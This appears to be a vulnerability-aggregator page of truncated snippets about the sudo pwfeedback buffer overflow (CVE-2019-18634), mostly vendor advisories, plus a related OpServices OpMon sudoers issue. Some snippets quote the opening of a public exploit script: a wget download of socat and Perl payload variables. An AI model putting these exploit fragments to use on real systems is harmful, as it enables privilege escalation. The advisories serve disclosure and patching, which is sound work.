Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the...

sudo: Stack based buffer overflow when pwfeedback is enabled

A flaw was found in the Sudo application when the ’pwfeedback' option is set to true on the sudoers file. An authenticated user can use this vulnerability to trigger a stack-based buffer overflow under certain conditions even without Sudo privileges. The buffer overflow may allow an attacker to...

Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...

sudo: Stack based buffer overflow when pwfeedback is enabled

A flaw was found in the Sudo application when the ’pwfeedback' option is set to true on the sudoers file. An authenticated user can use this vulnerability to trigger a stack-based buffer overflow under certain conditions even without Sudo privileges. The buffer overflow may allow an attacker to...

RHEL 8 : sudo (RHSA-2020:0509)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0509 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

RHEL 8 : sudo (RHSA-2020:0487)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0487 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

Exploit for Out-of-bounds Write in Sudo_Project Sudo

PoC exploit for CVE-2019-18634, a vulnerability in the Sudo pack...

Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

MGASA-2020-0081 Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

Exploit for Out-of-bounds Write in Sudo_Project Sudo

CVE-2019-18634 :warning: This code has only been tested on...

CVE-2020-7954

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

Design/Logic Flaw

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

Sudo 1.8.25p - pwfeedback Buffer Overflow

Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

[ASA-202002-2] sudo: privilege escalation

Arch Linux Security Advisory ASA-202002-2 ========================================= Severity: High Date : 2020-02-06 CVE-ID : CVE-2019-18634 Package : sudo Type : privilege escalation Remote : No Link : https://security.archlinux.org/AVG-1093 Summary ======= The package sudo before version 1.8.31...

USN-4263-2: Sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

USN-4263-2 sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

Sudo 1.8.25p - (pwfeedback) Buffer Overflow Exploit

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

RHEL 8 : sudo (RHSA-2020:0388)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0388 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

sudo: Privilege escalation via 'Runas' specification with 'ALL' keyword

A flaw was found in the way sudo implemented running commands with arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction...